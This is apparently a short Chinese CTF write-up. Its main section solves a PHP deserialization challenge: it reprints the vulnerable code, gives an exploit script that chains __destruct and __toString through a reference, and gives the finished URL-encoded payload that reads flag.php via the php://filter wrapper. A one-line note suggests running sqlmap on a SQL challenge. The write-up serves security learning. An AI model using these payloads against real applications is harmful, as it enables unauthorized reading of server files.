目录
SIGNIN
新猫和老鼠
baby_sql
SIGNIN
签到抓包
新猫和老鼠
看到反序列化
来分析一下
<?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class mouse
{
public $v;
public function __toString()
{
echo "Good. You caught the mouse:";
include($this->v);
这里出现 文件包含 说明 flag.php要在这里进行读取
}
}
class cat
{
public $a;
public $b;
public $c;
public function __destruct(){
$this->dog();
$this->b = $this->c;
die($this->a);
}
public function dog()
{
$this->a = "I'm a vicious dog, Kitty";
}
}
unserialize($_GET["cat"]);
?> 总的来说 就是 通过伪协议访问 flag.php
然后我们需要构造 字符串为 伪协议的
然后通过传递参数到 a中 让 cat执行 伪协议即可
exp
<?php
class mouse
{
public $v="php://filter/read=convert.base64-encode/resource=flag.php";
}
class cat
{
public $a;
public $b;
public $c;
}
$ee = new cat();
$ee-> c = new mouse();
$ee-> b = &$ee->a;
echo urlencode(serialize($ee));
?>
先构造伪协议 作为mouse
然后构造 cat 然后把 c写入 伪协议
然后再把b写入 a的值
进行url编码和序列化 
输入后 就会触发 _toString函数
O%3A3%3A%22cat%22%3A3%3A%7Bs%3A1%3A%22a%22%3BN%3Bs%3A1%3A%22b%22%3BR%3A2%3Bs%3A1%3A%22c%22%3BO%3A5%3A%22mouse%22%3A1%3A%7Bs%3A1%3A%22v%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D
baby_sql
post类型 抓包放入sqlmap跑一下
